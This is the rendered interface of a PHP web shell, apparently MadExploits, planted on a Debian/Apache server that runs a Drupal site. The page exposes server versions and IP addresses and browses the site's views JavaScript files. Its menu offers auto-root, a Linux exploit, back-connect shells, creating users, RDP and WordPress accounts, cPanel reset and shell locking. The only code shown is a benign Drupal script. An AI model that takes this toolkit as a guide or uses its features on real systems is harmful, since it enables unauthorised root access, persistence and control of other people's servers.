Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.138.60.175
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax.js
8.78
KB
-rw-r--r--
ajax_view.js
4.93
KB
-rw-r--r--
base.js
3.01
KB
-rw-r--r--
jquery.ui.dialog.patch.js
1.13
KB
-rw-r--r--
views-admin.js
36.88
KB
-rw-r--r--
views-contextual.js
504
B
-rw-r--r--
views-list.js
633
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views-list.js
/** * @file * Javascript related to the main view list. */ (function ($) { Drupal.behaviors.viewsUIList = { attach: function (context) { $('#ctools-export-ui-list-items thead a').once('views-ajax-processed').each(function() { $(this).click(function() { var query = $.deparam.querystring(this.href); $('#ctools-export-ui-list-form select[name=order]').val(query['order']); $('#ctools-export-ui-list-form select[name=sort]').val(query['sort']); $('#ctools-export-ui-list-form input.ctools-auto-submit-click').trigger('click'); return false; }); }); } }; })(jQuery);
Close